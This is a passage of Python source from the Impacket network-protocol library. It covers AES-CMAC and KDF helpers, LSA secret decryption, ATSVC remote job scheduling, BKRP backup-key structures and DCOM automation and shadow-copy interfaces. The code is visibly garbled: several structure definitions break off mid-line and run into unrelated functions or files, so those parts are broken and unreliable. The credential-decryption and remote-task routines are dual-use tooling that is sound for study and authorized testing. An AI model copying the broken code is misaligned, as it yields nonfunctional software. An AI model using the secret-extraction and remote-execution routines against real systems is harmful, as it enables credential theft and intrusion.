subkey) +\n# + K2 (128-bit second subkey) +\n# +-------------------------------------------------------------------+\n# + +\n# + Constants: const_Zero is 0x00000000000000000000000000000000 +\n# + const_Rb is 0x00000000000000000000000000000087 +\n# + Variables: L for output of AES-128 applied to 0^128 +\n# + +\n# + Step 1. L := AES-128(K, const_Zero); +\n# + Step 2. if MSB(L) is equal to 0 +\n# + then K1 := L << 1; +\n# + else K1 := (L << 1) XOR const_Rb; +\n# + Step 3. if MSB(K1) is equal to 0 +\n# + then K2 := K1 << 1; +\n# + else K2 := (K1 << 1) XOR const_Rb; +\n# + Step 4. return K1, K2; +\n# + +\n# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\n AES_128 = AES.new(K, AES.MODE_ECB)\n\n L = AES_128.encrypt(bytes(bytearray(16)))\n\n LHigh = unpack('>Q',L[:8])[0]\n LLow = unpack('>Q',L[8:])[0]\n\n K1High = ((LHigh << 1) | ( LLow >> 63 )) & 0xFFFFFFFFFFFFFFFF\n K1Low = (LLow << 1) & 0xFFFFFFFFFFFFFFFF\n\n if (LHigh >> 63):\n K1Low ^= 0x87\n\n K2High = ((K1High << 1) | (K1Low >> 63)) & 0xFFFFFFFFFFFFFFFF\n K2Low = ((K1Low << 1)) & 0xFFFFFFFFFFFFFFFF\n\n if (K1High >> 63):\n K2Low ^= 0x87\n\n K1 = bytearray(pack('>QQ', K1High, K1Low))\n K2 = bytearray(pack('>QQ', K2High, K2Low))\n\n return K1, K2\n\ndef XOR_128(N1,N2):\n\n J = bytearray()\n for i in range(len(N1)):\n #J.append(indexbytes(N1,i) ^ indexbytes(N2,i))\n J.append(N1[i] ^ N2[i])\n return J\n\ndef PAD(N):\n padLen = 16-len(N)\n return N + b'\\x80' + b'\\x00'*(padLen-1)\n\ndef AES_CMAC(K, M, length):\n\n# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n# + Algorithm AES-CMAC +\n# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n# + +\n# + Input : K ( 128-bit key ) +\n# + : M ( message to be authenticated ) +\n# + : len ( length of the message in octets ) +\n# + Output : T ( message authentication code ) +\n# + +\n# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n# + Constants: const_Zero is 0x00000000000000000000000000000000 +\n# + const_Bsize is 16 +\n# + +\n# + Variables: K1, K2 for 128-bit subkeys +\n# + M_i is the i-th block (i=1..ceil(len/const_Bsize)) +\n# + M_last is the last block xor-ed with K1 or K2 +\n# + n for number of blocks to be processed +\n# + r for number of octets of last block +\n# + flag for denoting if last block is complete or not +\n# + +\n# + Step 1. (K1,K2) := Generate_Subkey(K); +\n# + Step 2. n := ceil(len/const_Bsize); +\n# + Step 3. if n = 0 +\n# + then +\n# + n := 1; +\n# + flag := false; +\n# + else +\n# + if len mod const_Bsize is 0 +\n# + then flag := true; +\n# + else flag := false; +\n# + +\n# + Step 4. if flag is true +\n# + then M_last := M_n XOR K1; +\n# + else M_last := padding(M_n) XOR K2; +\n# + Step 5. X := const_Zero; +\n# + Step 6. for i := 1 to n-1 do +\n# + begin +\n# + Y := X XOR M_i; +\n# + X := AES-128(K,Y); +\n# + end +\n# + Y := M_last XOR X; +\n# + T := AES-128(K,Y); +\n# + Step 7. return T; +\n# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\n const_Bsize = 16\n const_Zero = bytearray(16)\n\n AES_128= AES.new(K, AES.MODE_ECB)\n M = bytearray(M[:length])\n K1, K2 = Generate_Subkey(K)\n n = len(M)//const_Bsize\n\n if n == 0:\n n = 1\n flag = False\n else:\n if (length % const_Bsize) == 0:\n flag = True\n else:\n n += 1\n flag = False\n\n M_n = M[(n-1)*const_Bsize:]\n if flag is True:\n M_last = XOR_128(M_n,K1)\n else:\n M_last = XOR_128(PAD(M_n),K2)\n\n X = const_Zero\n for i in range(n-1):\n M_i = M[(i)*const_Bsize:][:16]\n Y = XOR_128(X, M_i)\n X = bytearray(AES_128.encrypt(bytes(Y)))\n Y = XOR_128(M_last, X)\n T = AES_128.encrypt(bytes(Y))\n\n return T\n\ndef AES_CMAC_PRF_128(VK, M, VKlen, Mlen):\n# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n# + AES-CMAC-PRF-128 +\n# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n# + +\n# + Input : VK (Variable-length key) +\n# + : M (Message, i.e., the input data of the PRF) +\n# + : VKlen (length of VK in octets) +\n# + : len (length of M in octets) +\n# + Output : PRV (128-bit Pseudo-Random Variable) +\n# + +\n# +-------------------------------------------------------------------+\n# + Variable: K (128-bit key for AES-CMAC) +\n# + +\n# + Step 1. If VKlen is equal to 16 +\n# + Step 1a. then +\n# + K := VK; +\n# + Step 1b. else +\n# + K := AES-CMAC(0^128, VK, VKlen); +\n# + Step 2. PRV := AES-CMAC(K, M, len); +\n# + return PRV; +\n# + +\n# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n if VKlen == 16:\n K = VK\n else:\n K = AES_CMAC(bytes(bytearray(16)), VK, VKlen)\n\n PRV = AES_CMAC(K, M, Mlen)\n\n return PRV\n\ndef KDF_CounterMode(KI, Label, Context, L):\n# Implements NIST SP 800-108 Section 5.1, with PRF HMAC-SHA256\n# https://tools.ietf.org/html/draft-irtf-cfrg-kdf-uses-00#ref-SP800-108\n# Fixed values:\n# 1. h - The length of the output of the PRF in bits, and\n# 2. r - The length of the binary representation of the counter i.\n# Input: KI, Label, Context, and L.\n# Process:\n# 1. n := [L/h]\n# 2. If n > 2r-1, then indicate an error and stop.\n# 3. result(0):= empty .\n# 4. For i = 1 to n, do\n# a. K(i) := PRF (KI, [i]2 || Label || 0x00 || Context || [L]2)\n# b. result(i) := result(i-1) || K(i).\n# 5. Return: KO := the leftmost L bits of result(n).\n h = 256\n r = 32\n\n n = L // h\n\n if n == 0:\n n = 1\n\n if n > (pow(2,r)-1):\n raise Exception(\"Error computing KDF_CounterMode\")\n\n result = b''\n K = b''\n\n for i in range(1,n+1):\n input = pack('>L', i) + Label + b'\\x00' + Context + pack('>L',L)\n K = hmac.new(KI, input, hashlib.sha256).digest()\n result = result + K\n\n return result[:(L//8)]\n\n# [MS-LSAD] Section 5.1.2 / 5.1.3\nclass LSA_SECRET_XP(Structure):\n structure = (\n ('Length','> 0x01) )\n OutputKey.append( chr(((ord(InputKey[0:1])&0x01)<<6) | (ord(InputKey[1:2])>>2)) )\n OutputKey.append( chr(((ord(InputKey[1:2])&0x03)<<5) | (ord(InputKey[2:3])>>3)) )\n OutputKey.append( chr(((ord(InputKey[2:3])&0x07)<<4) | (ord(InputKey[3:4])>>4)) )\n OutputKey.append( chr(((ord(InputKey[3:4])&0x0F)<<3) | (ord(InputKey[4:5])>>5)) )\n OutputKey.append( chr(((ord(InputKey[4:5])&0x1F)<<2) | (ord(InputKey[5:6])>>6)) )\n OutputKey.append( chr(((ord(InputKey[5:6])&0x3F)<<1) | (ord(InputKey[6:7])>>7)) )\n OutputKey.append( chr(ord(InputKey[6:7]) & 0x7F) )\n\n for i in range(8):\n OutputKey[i] = chr((ord(OutputKey[i]) << 1) & 0xfe)\n\n return b(\"\".join(OutputKey))\n\ndef decryptSecret(key, value):\n # [MS-LSAD] Section 5.1.2\n plainText = b''\n key0 = key\n for i in range(0, len(value), 8):\n cipherText = value[:8]\n tmpStrKey = key0[:7]\n tmpKey = transformKey(tmpStrKey)\n Crypt1 = DES.new(tmpKey, DES.MODE_ECB)\n plainText += Crypt1.decrypt(cipherText)\n key0 = key0[7:]\n value = value[8:]\n # AdvanceKey\n if len(key0) < 7:\n key0 = key[len(key0):]\n\n secret = LSA_SECRET_XP(plainText)\n return (secret['Secret'])\n\ndef encryptSecret(key, value):\n # [MS-LSAD] Section 5.1.2\n cipherText = b''\n key0 = key\n value0 = pack('.\n# There are test cases for them too.\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n\nfrom impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray\nfrom impacket.dcerpc.v5.dtypes import DWORD, LPWSTR, UCHAR, ULONG, LPDWORD, NULL\nfrom impacket import hresult_errors\nfrom impacket.uuid import uuidtup_to_bin\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\n\nMSRPC_UUID_ATSVC = uuidtup_to_bin(('1FF70682-0A51-30E8-076D-740BE8CEE98B','1.0'))\n\nclass DCERPCSessionError(DCERPCException):\n def __init__(self, error_string=None, error_code=None, packet=None):\n DCERPCException.__init__(self, error_string, error_code, packet)\n\n def __str__( self ):\n key = self.error_code\n if key in hresult_errors.ERROR_MESSAGES:\n error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]\n error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]\n return 'TSCH SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)\n else:\n return 'TSCH SessionError: unknown error code: 0x%x' % self.error_code\n\n################################################################################\n# CONSTANTS\n################################################################################\nATSVC_HANDLE = LPWSTR\n# 2.3.1 Constant Values\nCNLEN = 15\nDNLEN = CNLEN\nUNLEN = 256\nMAX_BUFFER_SIZE = (DNLEN+UNLEN+1+1)\n\n# 2.3.7 Flags\nTASK_FLAG_INTERACTIVE = 0x1\nTASK_FLAG_DELETE_WHEN_DONE = 0x2\nTASK_FLAG_DISABLED = 0x4\nTASK_FLAG_START_ONLY_IF_IDLE = 0x10\nTASK_FLAG_KILL_ON_IDLE_END = 0x20\nTASK_FLAG_DONT_START_IF_ON_BATTERIES = 0x40\nTASK_FLAG_KILL_IF_GOING_ON_BATTERIES = 0x80\nTASK_FLAG_RUN_ONLY_IF_DOCKED = 0x100\nTASK_FLAG_HIDDEN = 0x200\nTASK_FLAG_RUN_IF_CONNECTED_TO_INTERNET = 0x400\nTASK_FLAG_RESTART_ON_IDLE_RESUME = 0x800\nTASK_FLAG_SYSTEM_REQUIRED = 0x1000\nTASK_FLAG_RUN_ONLY_IF_LOGGED_ON = 0x2000\n\n################################################################################\n# STRUCTURES\n################################################################################\n# 2.3.4 AT_INFO\nclass AT_INFO(NDRSTRUCT):\n structure = (\n ('JobTime',DWORD),\n ('DaysOfMonth',DWORD),\n ('DaysOfWeek',UCHAR),\n ('Flags',UCHAR),\n ('Command',LPWSTR),\n )\n\nclass LPAT_INFO(NDRPOINTER):\n referent = (\n ('Data',AT_INFO),\n )\n\n# 2.3.6 AT_ENUM\nclass AT_ENUM(NDRSTRUCT):\n structure = (\n ('JobId',DWORD),\n ('JobTime',DWORD),\n ('DaysOfMonth',DWORD),\n ('DaysOfWeek',UCHAR),\n ('Flags',UCHAR),\n ('Command',LPWSTR),\n )\n\nclass AT_ENUM_ARRAY(NDRUniConformantArray):\n item = AT_ENUM\n\nclass LPAT_ENUM_ARRAY(NDRPOINTER):\n referent = (\n ('Data',AT_ENUM_ARRAY),\n )\n\n# 2.3.5 AT_ENUM_CONTAINER\nclass AT_ENUM_CONTAINER(NDRSTRUCT):\n structure = (\n ('EntriesRead',DWORD),\n ('Buffer',LPAT_ENUM_ARRAY),\n )\n\n################################################################################\n# RPC CALLS\n################################################################################\n# 3.2.5.2.1 NetrJobAdd (Opnum 0)\nclass NetrJobAdd(NDRCALL):\n opnum = 0\n structure = (\n ('ServerName',ATSVC_HANDLE),\n ('pAtInfo', AT_INFO),\n )\n\nclass NetrJobAddResponse(NDRCALL):\n structure = (\n ('pJobId',DWORD),\n ('ErrorCode',ULONG),\n )\n\n# 3.2.5.2.2 NetrJobDel (Opnum 1)\nclass NetrJobDel(NDRCALL):\n opnum = 1\n structure = (\n ('ServerName',ATSVC_HANDLE),\n ('MinJobId', DWORD),\n ('MaxJobId', DWORD),\n )\n\nclass NetrJobDelResponse(NDRCALL):\n structure = (\n ('ErrorCode',ULONG),\n )\n\n# 3.2.5.2.3 NetrJobEnum (Opnum 2)\nclass NetrJobEnum(NDRCALL):\n opnum = 2\n structure = (\n ('ServerName',ATSVC_HANDLE),\n ('pEnumContainer', AT_ENUM_CONTAINER),\n ('PreferedMaximumLength', DWORD),\n ('pResumeHandle', LPDWORD),\n )\n\nclass NetrJobEnumResponse(NDRCALL):\n structure = (\n ('pEnumContainer', AT_ENUM_CONTAINER),\n ('pTotalEntries', DWORD),\n ('pResumeHandle',LPDWORD),\n ('ErrorCode',ULONG),\n )\n\n# 3.2.5.2.4 NetrJobGetInfo (Opnum 3)\nclass NetrJobGetInfo(NDRCALL):\n opnum = 3\n structure = (\n ('ServerName',ATSVC_HANDLE),\n ('JobId', DWORD),\n )\n\nclass NetrJobGetInfoResponse(NDRCALL):\n structure = (\n ('ppAtInfo', LPAT_INFO),\n ('ErrorCode',ULONG),\n )\n\n################################################################################\n# OPNUMs and their corresponding structures\n################################################################################\nOPNUMS = {\n 0 : (NetrJobAdd,NetrJobAddResponse ),\n 1 : (NetrJobDel,NetrJobDelResponse ),\n 2 : (NetrJobEnum,NetrJobEnumResponse ),\n 3 : (NetrJobGetInfo,NetrJobGetInfoResponse ),\n}\n\n################################################################################\n# HELPER FUNCTIONS\n################################################################################\ndef hNetrJobAdd(dce, serverName = NULL, atInfo = NULL):\n netrJobAdd = NetrJobAdd()\n netrJobAdd['ServerName'] = serverName\n netrJobAdd['pAtInfo'] = atInfo\n return dce.request(netrJobAdd)\n\ndef hNetrJobDel(dce, serverName = NULL, minJobId = 0, maxJobId = 0):\n netrJobDel = NetrJobDel()\n netrJobDel['ServerName'] = serverName\n netrJobDel['MinJobId'] = minJobId\n netrJobDel['MaxJobId'] = maxJobId\n return dce.request(netrJobDel)\n\ndef hNetrJobEnum(dce, serverName = NULL, pEnumContainer = NULL, preferedMaximumLength = 0xffffffff):\n netrJobEnum = NetrJobEnum()\n netrJobEnum['ServerName'] = serverName\n netrJobEnum['pEnumContainer']['Buffer'] = pEnumContainer\n netrJobEnum['PreferedMaximumLength'] = preferedMaximumLength\n return dce.request(netrJobEnum)\n\ndef hNetrJobGetInfo(dce, serverName = NULL, jobId = 0):\n netrJobGetInfo = NetrJobGetInfo()\n netrJobGetInfo['ServerName'] = serverName\n netrJobGetInfo['JobId'] = jobId\n return dce.request(netrJobGetInfo)\n" }, { "path": "impacket/dcerpc/v5/bkrp.py", "content": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# [MS-BKRP] Interface implementation\n#\n# Best way to learn how to use these calls is to grab the protocol standard\n# so you understand what the call does, and then read the test case located\n# at https://github.com/fortra/impacket/tree/master/tests/SMB_RPC\n#\n# Some calls have helper functions, which makes it even easier to use.\n# They are located at the end of this file.\n# Helper functions start with \"h\".\n# There are test cases for them too.\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n# ToDo:\n# [ ] 2.2.2 Client-Side-Wrapped Secret\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom impacket.dcerpc.v5.ndr import NDRCALL, NDRPOINTER, NDRUniConformantArray\nfrom impacket.dcerpc.v5.dtypes import DWORD, NTSTATUS, GUID, RPC_SID, NULL\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket import system_errors\nfrom impacket.uuid import uuidtup_to_bin, string_to_bin\nfrom impacket.structure import Structure\n\nMSRPC_UUID_BKRP = uuidtup_to_bin(('3dde7c30-165d-11d1-ab8f-00805f14db40', '1.0'))\n\nclass DCERPCSessionError(DCERPCException):\n def __init__(self, error_string=None, error_code=None, packet=None):\n DCERPCException.__init__(self, error_string, error_code, packet)\n\n def __str__( self ):\n key = self.error_code\n if key in system_errors.ERROR_MESSAGES:\n error_msg_short = system_errors.ERROR_MESSAGES[key][0]\n error_msg_verbose = system_errors.ERROR_MESSAGES[key][1] \n return 'BKRP SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)\n else:\n return 'BKRP SessionError: unknown error code: 0x%x' % self.error_code\n\n################################################################################\n# CONSTANTS\n################################################################################\n\nBACKUPKEY_BACKUP_GUID = string_to_bin(\"7F752B10-178E-11D1-AB8F-00805F14DB40\")\nBACKUPKEY_RESTORE_GUID_WIN2K = string_to_bin(\"7FE94D50-178E-11D1-AB8F-00805F14DB40\")\nBACKUPKEY_RETRIEVE_BACKUP_KEY_GUID = string_to_bin(\"018FF48A-EABA-40C6-8F6D-72370240E967\")\nBACKUPKEY_RESTORE_GUID = string_to_bin(\"47270C64-2FC7-499B-AC5B-0E37CDCE899A\")\n\n################################################################################\n# STRUCTURES\n################################################################################\nclass BYTE_ARRAY(NDRUniConformantArray):\n item = 'c'\n\nclass PBYTE_ARRAY(NDRPOINTER):\n referent = (\n ('Data', BYTE_ARRAY),\n )\n\n# 2.2.4.1 Rc4EncryptedPayload Structure\nclass Rc4EncryptedPayload(Structure):\n structure = (\n ('R3', '32s=\"\"'),\n ('MAC', '20s=\"\"'),\n ('SID', ':', RPC_SID),\n ('Secret', ':'),\n )\n\n# 2.2.4 Secret Wrapped with Symmetric Key\nclass WRAPPED_SECRET(Structure):\n structure = (\n ('SIGNATURE', ' 0 THEN\n# PRINT Name of the method is rgBstrNames[0]\n# PRINT Parameters to above method are following\n# FOR Y = 1 to pcNames -1\n# PRINT rgBstrNames[Y]\n# END FOR\n# END IF\n# END FOR i\n# ENDIF\ndef enumerateMethods(iInterface):\n methods = dict()\n typeInfoCount = iInterface.GetTypeInfoCount()\n if typeInfoCount['pctinfo'] == 0:\n LOG.error('Automation Server does not support type information for this object')\n return {}\n iTypeInfo = iInterface.GetTypeInfo()\n iTypeAttr = iTypeInfo.GetTypeAttr()\n for x in range(iTypeAttr['ppTypeAttr']['cFuncs']):\n funcDesc = iTypeInfo.GetFuncDesc(x)\n names = iTypeInfo.GetNames(funcDesc['ppFuncDesc']['memid'], 255)\n print(names['rgBstrNames'][0]['asData'])\n funcDesc.dump()\n print('='*80)\n if names['pcNames'] > 0:\n name = names['rgBstrNames'][0]['asData']\n methods[name] = {}\n for param in range(1, names['pcNames']):\n methods[name][names['rgBstrNames'][param]['asData']] = ''\n if funcDesc['ppFuncDesc']['elemdescFunc'] != NULL:\n methods[name]['ret'] = funcDesc['ppFuncDesc']['elemdescFunc']['tdesc']['vt']\n\n return methods\n\ndef checkNullString(string):\n if string == NULL:\n return string\n\n if string[-1:] != '\\x00':\n return string + '\\x00'\n else:\n return string\n\nclass ITypeComp(IRemUnknown2):\n def __init__(self, interface):\n IRemUnknown2.__init__(self,interface)\n self._iid = IID_ITypeComp\n\nclass ITypeInfo(IRemUnknown2):\n def __init__(self, interface):\n IRemUnknown2.__init__(self,interface)\n self._iid = IID_ITypeInfo\n\n def GetTypeAttr(self):\n request = ITypeInfo_GetTypeAttr()\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n return resp\n\n def GetTypeComp(self):\n request = ITypeInfo_GetTypeComp()\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n return ITypeComp(INTERFACE(self.get_cinstance(), b''.join(resp['ppTComp']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))\n\n def GetFuncDesc(self, index):\n request = ITypeInfo_GetFuncDesc()\n request['index'] = index\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n return resp\n\n def GetNames(self, memid, cMaxNames=10):\n request = ITypeInfo_GetNames()\n request['memid'] = memid\n request['cMaxNames'] = cMaxNames\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n return resp\n\n def GetDocumentation(self, memid, refPtrFlags=15):\n request = ITypeInfo_GetDocumentation()\n request['memid'] = memid\n request['refPtrFlags'] = refPtrFlags\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n return resp\n\n\nclass IDispatch(IRemUnknown2):\n def __init__(self, interface):\n IRemUnknown2.__init__(self,interface)\n self._iid = IID_IDispatch\n\n def GetTypeInfoCount(self):\n request = IDispatch_GetTypeInfoCount()\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n return resp\n\n def GetTypeInfo(self):\n request = IDispatch_GetTypeInfo()\n request['iTInfo'] = 0\n request['lcid'] = 0\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n return ITypeInfo(INTERFACE(self.get_cinstance(), b''.join(resp['ppTInfo']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))\n\n def GetIDsOfNames(self, rgszNames, lcid = 0):\n request = IDispatch_GetIDsOfNames()\n request['riid'] = IID_NULL\n for name in rgszNames:\n tmpName = LPOLESTR()\n tmpName['Data'] = checkNullString(name)\n request['rgszNames'].append(tmpName)\n request['cNames'] = len(rgszNames)\n request['lcid'] = lcid\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n IDs = list()\n for id in resp['rgDispId']:\n IDs.append(id)\n\n return IDs\n\n def Invoke(self, dispIdMember, lcid, dwFlags, pDispParams, cVarRef, rgVarRefIdx, rgVarRef):\n request = IDispatch_Invoke()\n request['dispIdMember'] = dispIdMember\n request['riid'] = IID_NULL\n request['lcid'] = lcid\n request['dwFlags'] = dwFlags\n request['pDispParams'] = pDispParams\n request['cVarRef'] = cVarRef\n request['rgVarRefIdx'] = rgVarRefIdx\n request['rgVarRef'] = rgVarRefIdx\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n return resp\n" }, { "path": "impacket/dcerpc/v5/dcom/scmp.py", "content": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# [MS-SCMP]: Shadow Copy Management Protocol Interface implementation\n# This was used as a way to test the DCOM runtime. Further\n# testing is needed to verify it is working as expected\n#\n# Best way to learn how to use these calls is to grab the protocol standard\n# so you understand what the call does, and then read the test case located\n# at https://github.com/fortra/impacket/tree/master/tests/SMB_RPC\n#\n# Since DCOM is like an OO RPC, instead of helper functions you will see the\n# classes described in the standards developed.\n# There are test cases for them too.\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\nfrom __future__ import division\nfrom __future__ import print_function\nfrom impacket.dcerpc.v5.ndr import NDRENUM, NDRSTRUCT, NDRUNION\nfrom impacket.dcerpc.v5.dcomrt import PMInterfacePointer, INTERFACE, DCOMCALL, DCOMANSWER, IRemUnknown2\nfrom impacket.dcerpc.v5.dtypes import LONG, LONGLONG, ULONG, WSTR\nfrom impacket.dcerpc.v5.enum import Enum\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket import hresult_errors\nfrom impacket.uuid import string_to_bin\n\nclass DCERPCSessionError(DCERPCException):\n def __init__(self, error_string=None, error_code=None, packet=None):\n DCERPCException.__init__(self, error_string, error_code, packet)\n\n def __str__( self ):\n if self.error_code in hresult_errors.ERROR_MESSAGES:\n error_msg_short = hresult_errors.ERROR_MESSAGES[self.error_code][0]\n error_msg_verbose = hresult_errors.ERROR_MESSAGES[self.error_code][1] \n return 'SCMP SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)\n else:\n return 'SCMP SessionError: unknown error code: 0x%x' % self.error_code\n\n################################################################################\n# CONSTANTS\n################################################################################\n# 1.9 Standards Assignments\nCLSID_ShadowCopyProvider = string_to_bin('0b5a2c52-3eb9-470a-96e2-6c6d4570e40f')\nIID_IVssSnapshotMgmt = string_to_bin('FA7DF749-66E7-4986-A27F-E2F04AE53772')\nIID_IVssEnumObject = string_to_bin('AE1C7110-2F60-11d3-8A39-00C04F72D8E3')\nIID_IVssDifferentialSoftwareSnapshotMgmt = string_to_bin('214A0F28-B737-4026-B847-4F9E37D79529')\nIID_IVssEnumMgmtObject = string_to_bin('01954E6B-9254-4e6e-808C-C9E05D007696')\nIID_ShadowCopyProvider = string_to_bin('B5946137-7B9F-4925-AF80-51ABD60B20D5')\n\n# 2.2.1.1 VSS_ID\nclass VSS_ID(NDRSTRUCT):\n structure = (\n ('Data','16s=b\"\"'),\n )\n\n def getAlignment(self):\n return 2\n\n#2.2.1.2 VSS_PWSZ\nVSS_PWSZ = WSTR\n\n# 2.2.1.3 VSS_TIMESTAMP\nVSS_TIMESTAMP = LONGLONG\n\nerror_status_t = LONG\n################################################################################\n# STRUCTURES\n################################################################################\n# 2.2.2.1 VSS_OBJECT_TYPE Enumeration\nclass VSS_OBJECT_TYPE(NDRENUM):\n class enumItems(Enum):\n VSS_OBJECT_UNKNOWN = 0\n VSS_OBJECT_NONE = 1\n VSS_OBJECT_SNAPSHOT_SET = 2\n VSS_OBJECT_SNAPSHOT = 3\n VSS_OBJECT_PROVIDER = 4\n VSS_OBJECT_TYPE_COUNT = 5\n\n# 2.2.2.2 VSS_MGMT_OBJECT_TYPE Enumeration\nclass VSS_MGMT_OBJECT_TYPE(NDRENUM):\n class enumItems(Enum):\n VSS_MGMT_OBJECT_UNKNOWN = 0\n VSS_MGMT_OBJECT_VOLUME = 1\n VSS_MGMT_OBJECT_DIFF_VOLUME = 2\n VSS_MGMT_OBJECT_DIFF_AREA = 3\n\n# 2.2.2.3 VSS_VOLUME_SNAPSHOT_ATTRIBUTES Enumeration\nclass VSS_VOLUME_SNAPSHOT_ATTRIBUTES(NDRENUM):\n class enumItems(Enum):\n VSS_VOLSNAP_ATTR_PERSISTENT = 0x01\n VSS_VOLSNAP_ATTR_NO_AUTORECOVERY = 0x02\n VSS_VOLSNAP_ATTR_CLIENT_ACCESSIBLE = 0x04\n VSS_VOLSNAP_ATTR_NO_AUTO_RELEASE = 0x08\n VSS_VOLSNAP_ATTR_NO_WRITERS = 0x10\n\n# 2.2.2.4 VSS_SNAPSHOT_STATE Enumeration\nclass VSS_SNAPSHOT_STATE(NDRENUM):\n class enumItems(Enum):\n VSS_SS_UNKNOWN = 0x01\n VSS_SS_CREATED = 0x0c\n\n# 2.2.2.5 VSS_PROVIDER_TYPE Enumeration\nclass VSS_PROVIDER_TYPE(NDRENUM):\n class enumItems(Enum):\n VSS_PROV_UNKNOWN = 0\n\n# 2.2.3.7 VSS_VOLUME_PROP Structure\nclass VSS_VOLUME_PROP(NDRSTRUCT):\n structure = (\n ('m_pwszVolumeName', VSS_PWSZ),\n ('m_pwszVolumeDisplayName', VSS_PWSZ),\n )\n\n# 2.2.3.5 VSS_MGMT_OBJECT_UNION Union\nclass VSS_MGMT_OBJECT_UNION(NDRUNION):\n commonHdr = (\n ('tag', ULONG),\n )\n union = {\n VSS_MGMT_OBJECT_TYPE.VSS_MGMT_OBJECT_VOLUME: ('Vol', VSS_VOLUME_PROP),\n #VSS_MGMT_OBJECT_DIFF_VOLUME: ('DiffVol', VSS_DIFF_VOLUME_PROP),\n #VSS_MGMT_OBJECT_DIFF_AREA: ('DiffArea', VSS_DIFF_AREA_PROP),\n }\n\n# 2.2.3.6 VSS_MGMT_OBJECT_PROP Structure\nclass VSS_MGMT_OBJECT_PROP(NDRSTRUCT):\n structure = (\n ('Type', VSS_MGMT_OBJECT_TYPE),\n ('Obj', VSS_MGMT_OBJECT_UNION),\n )\n\n################################################################################\n# RPC CALLS\n################################################################################\n# 3.1.3 IVssEnumMgmtObject Details\n\n# 3.1.3.1 Next (Opnum 3)\nclass IVssEnumMgmtObject_Next(DCOMCALL):\n opnum = 3\n structure = (\n ('celt', ULONG),\n )\n\nclass IVssEnumMgmtObject_NextResponse(DCOMANSWER):\n structure = (\n ('rgelt', VSS_MGMT_OBJECT_PROP),\n ('pceltFetched', ULONG),\n ('ErrorCode', error_status_t),\n )\n\n# 3.1.2.1 Next (Opnum 3)\nclass IVssEnumObject_Next(DCOMCALL):\n opnum = 3\n structure = (\n ('celt', ULONG),\n )\n\nclass IVssEnumObject_NextResponse(DCOMANSWER):\n structure = (\n ('rgelt', VSS_MGMT_OBJECT_PROP),\n ('pceltFetched', ULONG),\n ('ErrorCode', error_status_t),\n )\n\nclass GetProviderMgmtInterface(DCOMCALL):\n opnum = 3\n structure = (\n ('ProviderId', VSS_ID),\n ('InterfaceId', VSS_ID),\n )\n\nclass GetProviderMgmtInterfaceResponse(DCOMANSWER):\n structure = (\n ('ppItf', PMInterfacePointer),\n ('ErrorCode', error_status_t),\n )\n\nclass QueryVolumesSupportedForSnapshots(DCOMCALL):\n opnum = 4\n structure = (\n ('ProviderId', VSS_ID),\n ('IContext', LONG),\n )\n\nclass QueryVolumesSupportedForSnapshotsResponse(DCOMANSWER):\n structure = (\n ('ppEnum', PMInterfacePointer),\n ('ErrorCode', error_status_t),\n )\n\nclass QuerySnapshotsByVolume(DCOMCALL):\n opnum = 5\n structure = (\n ('pwszVolumeName', VSS_PWSZ),\n ('ProviderId', VSS_ID),\n )\n\nclass QuerySnapshotsByVolumeResponse(DCOMANSWER):\n structure = (\n ('ppEnum', PMInterfacePointer),\n ('ErrorCode', error_status_t),\n )\n\n# 3.1.4.4.5 QueryDiffAreasForVolume (Opnum 6)\nclass QueryDiffAreasForVolume(DCOMCALL):\n opnum = 6\n structure = (\n ('pwszVolumeName', VSS_PWSZ),\n )\n\nclass QueryDiffAreasForVolumeResponse(DCOMANSWER):\n structure = (\n ('ppEnum', PMInterfacePointer),\n ('ErrorCode', error_status_t),\n )\n\n# 3.1.4.4.6 QueryDiffAreasOnVolume (Opnum 7)\nclass QueryDiffAreasOnVolume(DCOMCALL):\n opnum = 7\n structure = (\n ('pwszVolumeName', VSS_PWSZ),\n )\n\nclass QueryDiffAreasOnVolumeResponse(DCOMANSWER):\n structure = (\n ('ppEnum', PMInterfacePointer),\n ('ErrorCode', error_status_t),\n )\n\n\n################################################################################\n# OPNUMs and their corresponding structures\n################################################################################\nOPNUMS = 